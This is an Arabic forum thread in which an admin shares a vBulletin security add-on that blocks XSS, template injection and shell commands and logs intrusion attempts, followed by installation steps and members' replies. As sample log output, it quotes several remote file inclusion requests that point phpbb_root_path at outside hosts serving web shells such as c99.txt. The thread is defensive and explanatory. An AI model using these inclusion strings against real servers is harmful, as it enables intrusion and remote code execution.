Spacer_Close وداعا لها مع هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى

E

ENG MUHAMED

[ADMIN]
طاقم الإدارة
25 فبراير 2008
10,079
43
48
support-ar.net
السلام عليكم ورحمه الله وبركاته


هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى


vistalogo.gif


عمل الهاك : حماية المنتدى بشكل كامل بعون الله




2043.imgcache.gif


issw2.JPG



الخيار الاول : لتشغيل حمايه المنتدي

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

حجب عدة مواقع تساعد على العبث في المنتديات

تطوير للدوال القديمة للتوافق معه السيرفر

منع اكثر اوامر اليونكس وحيل الحقن في الشيل

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع


الان نأتي للقسم الاكثر اثارة للموضوع

عند دخولك مجلد sec

افتح الملف logfile_hacker.txt

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل



PHP: 
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808 
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808 

2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79 
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)

الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

طبعا الفاصلة تفصل بين كل معلومه ومعلومة



PHP: 
,

التاريخ والوقت


PHP: 
2007-12-11, 05:50:44,



عدد المحاولات


PHP: 
1197370244

ايبي الموقع المصااب


PHP: 
   209.67.223.188


الاصابة طبعا تشفرت لاغراض امنيه


PHP: 
   p=11575//codebb/lang_select

الاستغلال


PHP: 
   ?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?

نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه


PHP: 
   libwww-perl/5.808



الان شرح التركيب

امسح جميع هاكات لها علاقه في الحمايه او منع xss

اما من ركب هاك الحمايه issw v4.0 issw v3

عليه فقط حذف ملف البرودكت

وتركيب المحدث


شرح حذف الهاك


من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

ومن ثم حذف توابعه

---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي

واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور


الان من لوحت تحكم المنتدي قم برفع البرودكت


تم تجربت المنتج على الاصدار

3.6.x

3.7.0


التحميل فى المرفقات

💕
 

المرفقات

  • i.s.s.wv4.1.1.zip
    7.1 KB · المشاهدات: 329
س

سجدة المصريه

عضو جديد
26 يونيو 2008
1,326
6
0
والله يسعدنى ويشرفنى انى اكون اول واحده ارد علي الموضوع الجميل ده مثلك اخوى الغالي
بارك الله فيك ويحفظك يارب
 
K

killer

عضو جديد
27 أكتوبر 2008
118
0
0
الف شكر الك اخي
وجزاك الله خير
 
ب

بدر القرني

عضو جديد
12 سبتمبر 2008
2
0
0
تسلم يالغالي

لكن عندي سؤال

انا مارفعة الملف

sec

هل هومهم في تفعيل الهاك وحماية المنتدى ام مجرد لعرض محاولات الأختراق

ولكم مني اطيب تحيه



 
التعديل الأخير:
E

ENG MUHAMED

[ADMIN]
طاقم الإدارة
25 فبراير 2008
10,079
43
48
support-ar.net
تسلمو جميعا للمرور الطيب

بالنسبه للاخ بدر هو لعرض محاوله الاختراق فقط
 
ب

بدر القرني

عضو جديد
12 سبتمبر 2008
2
0
0
ENG MUHAMED

اكرر شكري العميق لك واتمنى لك التوفيق الدائم

ولكم مني اطيب تحيه وتقدير

وان شاءالله اكون عضو معاكم

بدر
 
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
أعلى أسفل